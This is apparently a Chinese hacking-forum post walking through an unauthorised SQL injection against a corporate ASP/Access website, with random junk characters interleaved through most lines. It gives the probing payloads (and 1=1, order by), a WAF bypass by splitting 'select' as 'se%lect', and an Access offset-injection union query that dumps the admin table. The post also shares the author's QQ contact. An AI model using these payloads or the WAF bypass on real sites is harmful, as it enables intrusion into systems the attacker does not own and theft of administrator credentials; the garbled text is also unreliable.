打开网站,一个企业站。
( w+ N0 ~& V& z2 M b
! t3 V' S8 c! Y8 ^
" I! x7 h& ^1 w9 k顺手加个admin
4 j% Q9 [6 {1 B2 _( d3 F& ^( T. B/ u1 u" k. E6 ?; Z/ Q
% M4 x& X7 b# R( a; ?) c. t
默认后台。 E1 n% }( s6 G+ ^" y; k+ @
回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。
; b' P* s! @3 l3 E- c( Y
! m! l4 ~( h: z1 G6 E- f7 T/ i4 W9 x6 }$ `: G9 v. v
, J* a9 Q8 m) }# `) P所以就不用御剑扫了,待会直接封IP。/ p! L& W5 _ H4 q9 }8 }4 \
9 q! i& A8 z2 O4 g0 q: D$ w H$ l2 d
用order by语句判断是否存在注入。
! P3 ?; e) U$ qhttp://www.xxx.com /product_show.asp?id=997 order by 1
' N" M- @2 Y5 }7 o0 Jhttp://www.xxx.com /product_show.asp?id=997 order by 1009 G: I& E- ?& B$ ?. s% M5 [1 i, M% z
现在存在注入,经测试后发现是9个字段。 e' D. L5 [' U
. {- M1 A* _8 {9 G( _8 M' H接下来进行联合查询,猜是否存在admin表。, s |3 A! V& n3 |6 {$ T
http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。
4 b2 b. z8 O; ~/ ]9 Y- }4 k8 `1 _) L3 |" I
6 @( @8 X! F# E% _
- Z$ V& `. H1 s' j, B7 {在select中间加个%,se%lect绕过安全狗。
+ `1 S1 @7 f+ V9 ]- _
$ N, s$ Q% s9 r- {4 h& Q$ i
6 O1 }* y8 r" p% M发现存在admin表,然后开始手工猜常用的字段。
. k$ K! c o- m6 ^6 ^8 x$ y纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。
9 ]! U% ?9 T+ W4 c 1 J2 L5 f) t6 R" g7 j' T' O
突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。3 n8 c; v+ v# t2 s7 N9 c* C) t5 t
4 Y+ S: T" a2 `0 o科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。! Q4 m# [: c8 {) h0 M, j1 A. H
http://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin1 [9 K7 j* Q9 [0 ^% A( @7 ]/ X
好了,敏感内容出显了。( R& i+ f% @% n" S7 O |+ X# c
- t9 W0 J+ i, R. N
; K6 x! }) z1 n. R5 H. u. N6 f: V9 }/ H5 E3 v
|